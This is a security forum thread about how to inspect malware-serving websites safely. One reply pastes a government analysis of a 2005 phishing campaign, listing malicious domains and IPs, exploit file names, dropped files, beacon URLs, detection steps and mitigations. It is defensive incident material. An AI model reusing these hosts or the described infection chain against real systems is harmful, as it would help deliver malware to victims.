Page 1 of 3 123 LastLast
Results 1 to 10 of 21

Thread: Website to website malware scanning

  1. #1
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152

    Website to website malware scanning

    I was checking out the NISCC (UNIRAS) website. Looking at their latest alert which was a standard email trying to get you to click on a link to go to a website(s) which would then try to infect you PC with some sort of malware.

    The alert lists the domains that could be referenced by the email



    Details:

    AusCERT has seen several different types of e-mail messages, attempting to
    entice the reader to a variety of domains including:

    http: // compaqhea.shrink.com/info.html
    http: // friendsortheenemy.net
    http: // healthcentretoronto.com
    http: // uh.gameage.co.uk
    http: // chamas.cl/info.html
    http: // abomagd.com/info.html
    http: // belgiumlive.hostmatrix.org/info.html
    http: // bluecalf.com/info.html
    http: // buenconsejo.cl/info.html
    http: // fondby.com/info.html
    http: // 6abari.net/info.html
    http: // al-barakah.org/info.html
    http: // megacontable.com/info.html
    http: // ohiohsfootball.net/info.html
    http: // wakeee.hostmatrix.org/info.html

    All of which are redirected back to:

    http: // friendsoftheenemy.net

    This site, installs additional malware which may also contact the hosts:

    khaliun.phpwebhosting.com
    domestictargetmarket.com
    xtrixasf.com
    palac-below.de

    Administrators may wish to actively block or monitor access to these domain
    names and URLs.
    If I stick any of the domains (friendsoftheenemy.net and lower) into surfcontrol to see if they are blocked none of them are on the surfcontrol list.

    Now I could block them manually on surfcontrol but I'd rather know what they are before I start randomly blocking websites.

    BUT how do I check out a potentially dangerous website without becoming compromised. And if I am running a locked down machine that would not be affected by the malware how would I know that the site is trying to infect my machine.

    I don't have access to a 'victim' machine which I could allow to become infected and then analyse and I don't have a route out of the network which doesn't go through a firewall.

    Is there such a thing as a website which I can point to the 'infecting' website which will pose as an unprotected browser and give me a report as to whether that website does indeed attempt to infect a passing browser?

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Is there such a thing as a website which I can point to the 'infecting' website which will pose as an unprotected browser and give me a report as to whether that website does indeed attempt to infect a passing browser?
    I haven't heard of one. I believe Microsoft have a project doing this sort of thing "honey monkey"?

    Most of this stuff is geared to attack Windows and Internet Explorer. Maybe using a scanning tool like Black Widow would show you the redirects?

    And if I am running a locked down machine that would not be affected by the malware how would I know that the site is trying to infect my machine.
    If your policies and patches are protecting you, you won't. If it is security software it will probably give you a message.

    BUT how do I check out a potentially dangerous website without becoming compromised.
    Well I would probably go for a Virtual Machine and Linux, not a perfect solution by any means but a bit safer at the moment?


  3. #3
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152
    VM was one thing that came to mind. I doubt I could blag it though.

    I'll check out Black Widow though, just downloaded the demo.

    Cheers Nihil.

  4. #4
    Junior Member
    Join Date
    Oct 2005
    Posts
    6
    You could try Spade for Windows from samspade.org

    http://samspade.org/ssw/

    It allows you to view exactly what a website has in its coding without actually getting it on your box.

  5. #5
    ASPMAN - I know your question was probably more about how YOU could do an analysis of malware safely and not the one you mentioned in particular but.....

    The Aus Govt IT security organisation got concerned about this specific threat and sent out a number of alerts about this to Govt departments. My govt department actually received one of the email messages, I did a bit of investigation - and ran the page in our test lab (isolated environment). We are running XP SP2 and latest definitions and patches etc and it had no effect.

    The organisation did a pretty indepth analysis of the alert, I don't think I can post the PDF as it is only available through logging in to the organisations members area (even though looking at the PDF I can't see any classified information) but below is the relevent information you may need for this particular alert.

    Attack methodology

    The first instance of this attack consisted of an email with the subject heading
    “SecuryTeam Order #117457 will be processed manually by our staff.txt” that
    downloaded exploits from !!removeme!!http://friendsoftheenemy.net (IP 66.235.192.219)
    and beaconed for updates to !!removeme!!www.inosys.pt(IP 207.58.141.126). This
    attack was first noticed on Saturday 22 October 2005.

    The second instance of this attack used a different email subject header “Jools Web
    Hosting - Receipt of you Payment!”. The address contained within the email did not
    resolve, however a new exploit server came into operation at “hi****upport.com”
    (IP 64.156.24.17) and a beacon address of “milanodvd.com” (IP 64.34.91.142).

    Results of investigation

    Exploit explanation

    The exploit is an executable that has been compressed with the “FSG” compression
    utility, downloaded after one of five possible exploits is identified and run. Following is
    a detailed description of how it operates.

    The malicious email infects a user’s computer in 5 steps.

    1. The user clicks on the link in the email. This link is very dynamic - different for
    almost every email we have seen, resolving to multiple IP addresses. An
    example is shown below (with !!removeme!! inserted for your protection):
    !!removeme!!http://uh.gameage.co.uk/info.html.

    This link is an obfuscated javascript file that forwards the user to the following
    address !!removeme!!http://friendsoftheenemy.net/cgi-bin/ie0509.html.
    (IP 66.235.192.219)

    2. This site runs another script that determines which OS, service pack, AntiVirus
    (Norton or McAfee), and the Microsoft Java Virtual Machine (JVM) version that
    the target computer is running. It then selects an exploit based on this
    information. A copy of this information is forwarded to the following URL:
    !!removeme!!http://tsl.promotion-city.com/fullstat.htm. (IP 81.209.184.142)

    3. Based on the information gained above, an exploit will be selected.
    There are 5 different types of exploits available from the URL
    !!removeme!!http://friendsoftheenemy.net/cgi-bin...cgi?exploit=XX (where
    XX depends on the exploit selected). The exploits are:
    ie0509a.chm
    ie0509b.jar
    pluginst.hta
    pluginst.anr
    ie0509d.html

    Note that this site is no longer serving exploits.
    Requests to the above address are now (as of 26/10/2005) redirected to URL
    !!removeme!!http://host135.ipowerweb.com/suspended.html?exploit=
    (IP 66.235.192.212)

    4. After an exploit is chosen, it is used to install a program on the target computer.
    A get request is sent for !!removeme!!http://friendsoftheenemy.net/cgibin/
    ie0509.cgi?exploit=XX which downloads the FSG packed executable (XX
    again depends upon the chosen exploit).
    When this executable is unpacked and run it drops:
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WIN32HOST.EXE
    (hidden)
    C:\WINDOWS\system32\iedld32.dll

    It uses cmd.exe to delete the unpacked version of itself and appears to use
    simple rootkit techniques to hide the win32host.exe file and process (see
    identifying infection for how to circumvent the rootkit).

    The program then downloads the next part of the Trojan (providing IE is running)
    called update.exe from !!removeme!!http://friendsoftheenemy.net/cgibin/
    ie0509.cgi?exploit=1
    Or, in the second instance of the email, from:
    !!removeme!!http://milanodvd.com/cgi-bin/dloader.cgi?userid=**
    Where ** is an 8 character hex id.

    This program then goes on to create further files as shown below (tested on a
    Windows XP machine with no service pack)

    Files installed on the infected computer:
    C:\Windows\System32\iedld.dll (Hidden)
    C:\Windows\System32\phffg.dll
    C:\Windows\System32\svshotc.exe
    C:\Windows\WindowsShell\manifest.dll
    win32host.exe appears to write its results to a file called nul in the same
    directory as win32host.exe.

    The second email and executable installs the following (tested on a Windows XP
    SP2 machine):
    C:\Windows\System32\phffg.dll
    C:\Windows\System32\svvhost.exe

    5. An analysis of the network traffic post-infection shows that this executable
    (Win32Host.exe) makes a get request (providing IE is running) to
    !!removeme!!www.inosys.pt\cgi-bin\dloader.cgi?userid=** approximately every
    hour for an update. The second email uses
    !!removeme!!http://milanodvd.com/cgi-bin/dloader.cgi?userid=** in the same way.
    where ** is an 8 character hex string that is probably unique to the
    compromised machine.

    If there is no update, the website responds with:

    "
    20
    There is no update for **
    0
    "
    Again, ** refers to the hex userid.

    It appears that this program is being used to control the computer and use it like
    a “bot” waiting for commands to come from the download of the update file.
    Identifying the infection
    To identify the trojan process (Win32HOST.exe):
    Click on the start menu
    Navigate to All Programs
    Navigate to Accessories
    Click on System Information
    Once the System Information program is open
    Click Software Environment
    Click on Running Tasks
    To find the win32host.exe file, use the command prompt and navigate to
    C:\WINDOWS\System32

    If a computer is infected one of the running tasks will be:
    Name - Win32host.exe
    Path - C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Win32host.exe
    Look for any of the following files:
    C:\Windows\System32\iedld32.dll
    C:\Windows\System32\iedld.dll (Hidden)
    C:\Windows\System32\phffg.dll
    C:\Windows\System32\svshotc.exe
    C:\Windows\WindowsShell\manifest.dll
    C:\Windows\System32\svvhost.exe
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Win32host.exe (Hidden)
    update.exe
    ie0509a.chm
    ie0509b.jar
    pluginst.hta
    pluginst.anr
    ie0509d.html
    msits.exe

    Look in proxy logs for instances of:
    friendsoftheenemy.net (indicates email delivered and user clicked on it) !"
    hi****upport.com (indicates possible compromise)
    inosys.pt (indicates possible compromise)
    tsl.promotion-city.com (indicates possible compromise)
    milanodvd.com (indicates possible compromise)

    Look in mail server logs for emails with subjects “SecuryTeam Order #117457 will be
    processed manually by our staff.txt” and “Jools Web Hosting - Receipt of you
    Payment!”.

    Vulnerabilities exploited
    There are 5 different exploits that can be downloaded/executed depending on the
    operating system version, browser and/or Microsoft Java Virtual Machine (JVM) build.
    Security bulletins/patches, if available, are also listed.
    ie0509a.chm
    Takes advantage of known vulnerability in HTML help ActiveX control. Allows code
    execution. (See Microsoft Security Bulletin MS03-011 for further details,
    recommendations, and mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec...1.mspx?pf=true

    ie0509b.jar
    Takes advantage of known vulnerability in older versions of Microsoft VM (build 3809 or
    earlier) to execute arbitrary code. Attacker would gain privileges of the user who follows
    the link. (See Microsoft Security Bulletin MS03-011 for further details,
    recommendations, and mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec...1.mspx?pf=true
    pluginst.hta
    This is a HTML application. The code looks to have been taken from exploit code
    posted in April 2005 at http://seclists.org/lists/bugtraq/2005/Apr/0446.html

    ie0509c.htm (pluginst.anr)
    Takes advantage of known vulnerability in cursor and Icon format handling. Allows
    remote code execution and control of the system. (See Microsoft Security Bulletin
    MS05-002 for further details and recommendations on mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec...2.mspx?pf=true

    ie0509d.html
    Take advantage of known vulnerability in Internet Explorer that allows remote code
    execution and control of the system. (See Microsoft Security Bulletin MS04-040 for
    further details and recommendations on mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec.../MS04-040.mspx

    Mitigation action
    1. Block and log requests/responses for all the URLs and IPs mentioned above -
    remove the text !!removeme!! from the URLs given below:
    !!removeme!!http://friendsoftheenemy.net (IP 66.235.192.219)
    !!removeme!!http://tsl.promotion-city.com (IP 81.209.184.142)
    !!removeme!!http://host135.ipowerweb.com (IP 66.235.192.212)
    !!removeme!!www.inosys.pt (IP 207.58.141.126)
    !!removeme!!hi****upport.com (IP 64.156.24.17)
    !!removeme!!milanodvd.com (IP 64.34.91.142)

    2. Other mitigating factors for this attack
    Using a browser other than IE (or an OS other than Windows).
    Using a re-writing web proxy to sanitise active content on incoming web
    pages.
    Using a SOE with patches applied for each exploit as detailed in the
    Vulnerabilities Exploited section.
    Using a SOE with no user write privileges to system32 (i.e. no
    administration privileges).

  6. #6
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152
    Thanks cabby80, but the alert just got me thinking about this sort of thing in general rather than this specific threat.

    I ordered a copy of VMWare from Ebay yesterday. I have an inkling is was being sold by a guy with one leg and a parrot but I'll wait and see.

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    I ordered a copy of VMWare from Ebay yesterday. I have an inkling is was being sold by a guy with one leg and a parrot but I'll wait and see.
    Just take him down "The Admiral Benbow" and give him the "black spot"?


  8. #8
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    If I stick any of the domains (friendsoftheenemy.net and lower) into surfcontrol to see if they are blocked none of them are on the surfcontrol list.

    Now I could block them manually on surfcontrol but I'd rather know what they are before I start randomly blocking websites.
    This may be a little off topic but your response is exactly what drives my belief that white/black list technologies are no longer viable solutions. Why? Because when they were introduced, the number of malware sites were minimal. Today, there are oodles of sites cropping up by the minute which are aimed solely at your wallet. White/Black lists are no longer effective as they once were.

    How do you solve this issue? Well, in my case, I've been running a research project that basically runs a network like your immune system. I only allow what I know is good and disallow everything else.

    How is it going? Administrative overhead has certainly gone up. However, I have a 100% success rate and with the money saved by not having to remediate issues, it appears that I can ring up a cost savings to IT of nearly 60%. Some of my critics don't think I can scale this out to the enterprise but so far, I have already done what they considered impossible by rolling out my model to two large departments.

    I'm trying to think of a way to market it but Don Lapre and Carton Sheets seem busy at the moment.

    Anyway, rant over.

    --Th13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  9. #9
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152
    This may be of interest:

    http://www.securityfocus.com/columnists/367

    In this new model, new application files are detected in real time as soon they appear on systems and are automatically added to the automatic graylist. They can be easily approved or banned, based on current security policy.

  10. #10
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    This is basically what I'm attempting without having a black list. I simply say, X,Y and Z are ok, everything else is bad.

    This is simply revisiting the basics of explicit deny models but when something works....



    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •